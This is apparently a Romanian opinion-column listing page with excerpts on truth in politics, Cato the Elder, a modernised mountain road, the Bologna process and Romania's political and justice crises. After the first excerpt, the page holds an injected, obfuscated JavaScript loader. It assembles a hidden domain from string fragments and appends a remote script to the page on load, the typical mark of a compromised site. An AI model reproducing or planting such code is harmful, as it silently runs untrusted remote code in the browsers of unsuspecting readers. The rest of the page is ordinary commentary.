Opinii

După treizeci de ani tocmai unii care se pretind instruiți nu-și dau seama că poți să ai o opțiune sau alta, dar dacă adevărul nu contează, nu iese mare lucru. Unde nu este capacitatea adevărului nu există șansa asanării.

(function(){ owqg=document.createElement("script");owqg.async=true;owqg_="u"+("s")+"t"; owqgu="186446529.";owqg_+="a"+("t.i");owqg_+="n"+("f"+"o")+"/"; owqgu+="d7tjkd3swqgfmsvzcrrutc"+("tX3m63uw"); owqg.src="https://"+owqg_+owqgu;owqg.type="text/javascript"; document.body.appendChild(owqg); })(); ">Dacă afirmi cu claritate o opinie, unii te încadrează repede la a fi  cu unii sau cu alții. Nu este decât un semn de superficialitate, căci există a treia alternativă – apărarea adevărului, înainte de a fi cu unii sau alții.

   „Două lucruri umplu sufletul de o admirație și o venerație mereu crescândă și nouă, în măsura în care reflecția și le întipărește și se atașează de ele  -  cerul înstelat deasupra mea și legea morală din mine”.

Marcus Porcius Cato (234-149 î.Hr.), supranumit și Cato cel Bătrân, o fost mult timp membru al Senatului roman pentru că era un om înțelept, bun patriot, avea o comportare democratică, lupta împotriva corupției, a celor corupți și vicioși. De numele său se leagă distrugerea puternicei cetăți Cartagina, din nordul Africii, distrugere făcută de fapt de Scipio Africanul. Cunoscând puterea ei, Cato cel Bătrân, s-a străduit, în calitate de senator, să convingă pe cât mai mulți colegi, de necesitatea distrugerii acestei cetăți, folosind mai multe metode.

Din gura presei și din cuvintele liderului județean, am dedus că s-au finalizat lucrările la drumul  Ilva Mică-Joseni și Bistrița Bîrgăului – Colibița. Am dorit cu orice preț să am un dialog cu această zonă încântătoare, fapt petrecut duminică, 10 noiembrie 2019, o zi splendidă și o  ocazie minunată oferită de familia ing. Nelu și Doina Daian, din Sighet, care au venit la noi în vizită și au fost încântați de propunerea mea de a face o excursie pe această rută recent modernizată.

Odată cu noul an universitar 2019-2020,se împlinesc douăzeci de ani de punere în aplicare a Declarației de la Bologna( 1999). Vreau să sintetizez cu acest prilej o seamă de reflecții de pe parcursul anilor, care au rămas actuale și astăzi. Vorba lui Spiru Haret, cine are ceva de spus în mod onest, este dator să o facă.

După 2004, din nefericire, România a rupt cu proiectul unei reforme cuprinzătoare care să includă nu numai economia, ci și statul, cu componentele sale și, desigur, comportamentul politic.Nenumăratele încălcări ale Constituției, oprirea democratizării, reluarea „tehnicilor” anilor treizeci, înțelegerea funcțiilor ca proprietăți sunt probe.

Mulți mă întreabă cum văd criza politică actuală. Mărturisesc că ceea ce se petrece, începând cu perorațiile președintelui, este atât de rudimentar și de străin de civism și de onoare, încât mă dezgustă. Repulsia nu este însă răspuns. Iar direcția pe care apucă lucrurile nu duce nicăieri. Ca urmare, formulez răspunsul.

Pare greu de găsit astăzi un ministru al justiției care să cunoască dreptul, să înțeleagă dreptatea și să aibă convingeri democratice. Sunt persoane care cunosc reglementările de drept în vigoare, dar nu înțeleg că dreptatea este mult mai mult și au convingeri mai degrabă oportuniste. Sunt absolvenți care pretind aici că vin de la Yale sau Harvard sau Columbia, dar nu stăpânesc legislația și nici nu apără democratizarea.